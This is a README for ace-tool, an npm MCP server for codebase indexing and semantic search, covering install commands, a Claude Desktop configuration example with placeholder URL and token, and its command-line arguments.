SantiagoRM9

πŸš€ ace-tool - Simplify Codebase Searching Effortlessly

Download ace-tool


πŸ“– Overview

Welcome to ace-tool! This is a powerful tool designed to enhance your codebase management. With our tool, you can index your code seamlessly, perform semantic searches, and improve prompts for AI systems.


πŸ’» Download & Install

To get started, visit this page to download: GitHub Releases.

🎯 System Requirements

πŸ“₯ Installation Steps

  1. Open your terminal or command prompt.
  2. Run the following command to install ace-tool globally:

     npm install -g ace-tool@latest
    
  3. Alternatively, you can run it directly using npx:

     npx -y ace-tool@latest --base-url <URL> --token <TOKEN>
    

βš™οΈ Configuration

πŸ›  MCP Settings

To set up ace-tool with your MCP server, add the following configuration to your MCP settings file. For example, in Claude Desktop’s claude_desktop_config.json, include:

{
  "mcpServers": {
    "ace-tool": {
      "command": "npx",
      "args": [
        "ace-tool",
        "--base-url", "YOUR_BASE_URL",
        "--token", "YOUR_TOKEN"
      ]
    }
  }
}

πŸ“‹ Command Line Arguments

Here are the command line arguments you can use with ace-tool:

Argument Required Description
--base-url Yes API base URL for the indexing service
--token Yes Authentication token for access
--enable-log No Enable logging to .ace-tool/ace-tool.log

πŸ” Features

πŸ“œ Search Context

With ace-tool, you can search for relevant code based on a natural language query. Simply enter your query, and let the tool find the context for you. This makes it easier to discover where specific functions or variables are used in your code.

πŸ›  Additional Utilities

πŸ”’ Security

Your authentication token ensures that your operations are secure. Always keep your token private and secure to prevent unauthorized access.


πŸ“ž Support

If you need help or have questions, check our issue tracker or contact the community on our forum.


πŸ“œ License

This project is licensed under the MIT License. See the LICENSE file for details.


Thank you for using ace-tool! We hope it makes your code management simpler and more efficient.